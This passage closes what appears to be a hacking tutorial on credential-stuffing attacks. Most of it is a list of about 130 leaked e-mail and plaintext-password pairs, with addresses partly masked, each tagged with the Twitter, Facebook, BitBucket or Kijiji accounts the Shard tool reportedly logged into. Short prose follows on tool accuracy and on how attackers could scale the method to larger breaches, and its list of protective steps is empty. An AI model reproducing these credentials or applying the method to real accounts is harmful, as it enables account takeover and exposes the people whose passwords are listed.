[+] *******@mail.ru:271bEzxonZ - BitBucket
[+] *******@gmail.com:Raejas11 - Twitter
[+] *******@hotmail.com:2yvpdl13CP - BitBucket
[+] *******@mail.ru:x52Wugvl3D - BitBucket
[+] *******@hotmail.com:bcd234 - BitBucket
[+] *******@hotmail.com:dodgers123 - BitBucket
[+] *******@centurylink.net:zaq11qaz - BitBucket
[+] *******@hotmail.com:stumpy69 - BitBucket
[+] *******@gmail.com:506571670 - Twitter, BitBucket
[+] *******@ewjc.com:fr33ze - BitBucket
[+] *******@gmail.com:gyqK8Giz1P - BitBucket
[+] *******@gmail.com:abc12345 - BitBucket
[+] *******@hotmail.com:92k2cizCdP - BitBucket
[+] *******@gmail.com:123456 - BitBucket
[+] *******@yandex.com:drnCy43g4O - Twitter
[+] *******@gmail.com:makocole1 - Twitter, Kijiji
[+] *******@gmail.com:Ayrtonsenna1 - Facebook
[+] *******@gmail.com:sixsixsix - BitBucket
[+] *******@aol.com:aerielle - BitBucket
[+] *******@yahoo.com:12341234a - Twitter
[+] *******@gmail.com:6Ibit6qp1F - BitBucket
[+] *******@gmail.com:Sapper2009 - Facebook, Twitter, BitBucket
[+] *******@gmail.com:bma81092 - Twitter, BitBucket
[+] *******@hotmail.com:Tournament - BitBucket
[+] *******@hotmail.com:Lena2020 - Facebook, Twitter, BitBucket
[+] *******@yahoo.com:600543jp - BitBucket
[+] *******@blueyonder.co.uk:simpkins - BitBucket
[+] *******@gmail.com:linkin2632 - Twitter
[+] *******@yahoo.com:c572889 - Twitter
[+] *******@yahoo.com.mx:alejandro - BitBucket
[+] *******@gmail.com:conconabab - BitBucket
[+] *******@free.fr:sucette - BitBucket
[+] *******@hotmail.com:pipQc5p24Q - BitBucket
[+] *******@h4milton.com:pepper10 - BitBucket
[+] *******@gmail.com:Cheese24 - BitBucket
[+] *******@gmail.com:willow76! - Facebook, Kijiji
[+] *******@live.ca:shawn2000 - Twitter, BitBucket
[+] *******@gmail.com:spartan117 - Twitter, BitBucket
[+] *******@hotmail.com:fifa2007 - Twitter
[+] *******@yahoo.com:mike1828 - BitBucket
[+] *******@live.com:Bounce989 - Twitter, BitBucket
[+] *******@gmail.com:13241324 - Twitter
[+] *******@mail.ru:e5Bo1fx3kF - BitBucket
[+] *******@mail.ru:1doc2H5wxZ - BitBucket
[+] *******@mail.ru:irzF9k6p1H - Twitter
[+] *******@gmail.com:robox12 - Facebook, Twitter
[+] *******@hotmail.com:Helmond - BitBucket
[+] *******@gmail.com:Liam1123 - BitBucket
[+] *******@yahoo.com:be6315se - Twitter
[+] *******@hotmail.com:r1s2d3nt - BitBucket
[+] *******@hotmail.com:rock18 - BitBucket
[+] *******@gmail.com:bossos2 - BitBucket
[+] *******@gmail.com:highjump - BitBucket
[+] *******@googlemail.com:juhu1230 - BitBucket
[+] *******@charter.net:amanda11 - BitBucket
[+] *******@gmail.com:Adw2u1h3tO - BitBucket
[+] *******@hotmail.com:ragnarok01 - Twitter
[+] *******@hotmail.com:Bobbobbob5 - Twitter, BitBucket
[+] *******@gmail.com:Games123 - Twitter
[+] *******@hotmail.com:good4u - Kijiji
[+] *******@hotmail.com:2211 - BitBucket
[+] *******@gmail.com:Starwars97 - BitBucket
[+] *******@aol.com:hardass - BitBucket
[+] *******@gmail.com:scarface - BitBucket
[+] *******@t-online.de:143ABC1 - BitBucket
[+] *******@gmail.com:weswee234 - Twitter
[+] *******@hotmail.com:javiermago1 - BitBucket
[+] *******@yahoo.com:w1a2y3n4e5 - BitBucket
[+] *******@gmail.com:608881e - Kijiji
[+] *******@yahoo.com:74langley - BitBucket
[+] *******@hotmail.com:bosspimp - Facebook, Twitter
[+] *******@gmail.com:Driftking1 - Twitter
[+] *******@hotmail.com:voxpi384 - BitBucket
[+] *******@gmail.com:allah4life - BitBucket
[+] *******@comcast.net:Jackal67 - BitBucket
[+] *******@hotmail.com:jasmine00 - Facebook, BitBucket
[+] *******@gmail.com:10241966 - BitBucket
[+] *******@gmail.com:alfiedog12 - BitBucket
[+] *******@gmail.com:olivia1 - BitBucket
[+] *******@gmail.com:Rat_isthebest - Kijiji
[+] *******@web.de:scoop - BitBucket
[+] *******@hotmail.com:ikbengek1 - Twitter, BitBucket
[+] *******@allansmith.net:ras04cal - Twitter
[+] *******@419.e90.biz:b82olSn4yH - BitBucket
[+] *******@hotmail.com:Tototomy - Twitter
[+] *******@gmail.com:2211 - BitBucket
[+] *******@qq.com:1391730 - Twitter
[+] *******@gmail.com:robby123 - BitBucket
[+] *******@gmail.com:Logitech123 - BitBucket
[+] *******@yahoo.com:darkstar3509 - BitBucket
[+] *******@gmail.com:whodey - BitBucket
[+] *******@uhd.net.ua:h55gr5sKdQ - BitBucket
[+] *******@gmail.com:robox12 - BitBucket
[+] *******@gmail.com:12345Brandon - BitBucket
[+] *******@gmail.com:Banan123 - BitBucket
[+] *******@gmail.com:joshuavi - Kijiji
[+] *******@cox.net:damnkids - BitBucket
[+] *******@hotmail.com:1colort2 - BitBucket
[+] *******@live.com:roblox12 - Twitter, BitBucket
[+] *******@gmail.com:azerty00 - Twitter
[+] *******@gmail.com:apache7076 - Twitter
[+] *******@inmyd.ru:2wbJx11zaW - BitBucket
[+] *******@aim.com:thisisme - BitBucket
[+] *******@gmail.com:roofeng198 - BitBucket
[+] *******@GMAIL.COM:BASSETT92 - BitBucket
[+] *******@gmail.com:123456 - BitBucket
[+] *******@hotmail.com:syndrom02 - Twitter, BitBucket
[+] *******@gmail.com:bronco999 - BitBucket
[+] *******@hotmail.com:metallica4224 - Twitter
[+] *******@gmail.com:rawtheme22 - Twitter
[+] *******@gmail.com:sobaked123 - BitBucket
[+] *******@gmail.com:Thee1234 - BitBucket
[+] *******@hotmail.ca:0230176 - BitBucket
[+] *******@gmail.com:19722791 - BitBucket
[+] *******@gmail.com:indonesia2016 - BitBucket
[+] *******@live.co.uk:01cs653 - Facebook, BitBucket
[+] *******@gmail.com:Battlefield710 - Twitter, BitBucket
[+] *******@gmail.com:Supaman1 - Facebook
[+] *******@hotmail.com:Bigdick*12 - BitBucket
[+] *******@outlook.com:darkstar1 - BitBucket
[+] *******@web.de:gt9800 - BitBucket
[+] *******@yahoo.com:mvp123 - Twitter
[+] *******@yahoo.com:arturi09 - BitBucket
[+] *******@gmail.com:092486 - BitBucket
[+] *******@hotmail.com:sappeps12345 - BitBucket
[+] *******@yahoo.com:1morerep - Twitter, BitBucket
[+] *******@cox.net:joiedevivre - BitBucket
[+] *******@gmail.com:23vec4rPcC - BitBucket

After running the Shard command, a total of 219 Twitter, Facebook, BitBucket, and Kijiji accounts were reported as using the same username and password combinations. Interestingly, there were no Reddit detections this time.

The Shard results claim 166 BitBucket accounts compromised by this password-reuse attack, which does not match Credmap's 111 BitBucket detections. Neither Credmap nor Shard has been updated since 2016, and I suspect the BitBucket results are mostly, if not entirely, false positives. It is possible that BitBucket changed its login flow since 2016, breaking both tools' ability to recognize a successful login. Tools like these typically decide success by matching strings in the response page, so a changed form or a new bot-detection interstitial can turn every attempt into a "hit" until the module is updated; verify a sample by hand before trusting a count.

Motivated Hackers Can Crack Even More Passwords

In total, the compromised accounts (excluding the BitBucket results) consisted of 61 on Twitter, 52 on Reddit, 17 on Facebook, 29 on Scribd, 23 on Microsoft, and a handful on Foursquare, Wunderlist, and Kijiji. Roughly 200 online accounts were compromised as a result of one small data breach in 2017.

And keep in mind that neither Credmap nor Shard checks for password reuse against Amazon, Gmail, Netflix, iCloud, banking websites, or smaller sites that likely hold personal information, such as BestBuy, Macy's, and airlines.

If the Credmap and Shard modules were up to date, and if I had spent more time cracking the remaining 57% of the hashes, the numbers would be higher. With very little effort and time, an attacker can compromise hundreds of online accounts from a small data breach of just 1,100 e-mail addresses and hashed passwords.

A motivated attacker working from a dump of 8 million or 26 million unique records could wreak havoc across thousands of online accounts.

Don't Ignore Data Breaches…

If you don't want your usernames and passwords showing up in any of these leaked databases, there are a few obvious things you can do:

And until next time, you can find me on the darknet.


Cover photo by Justin Meyers/Null Byte



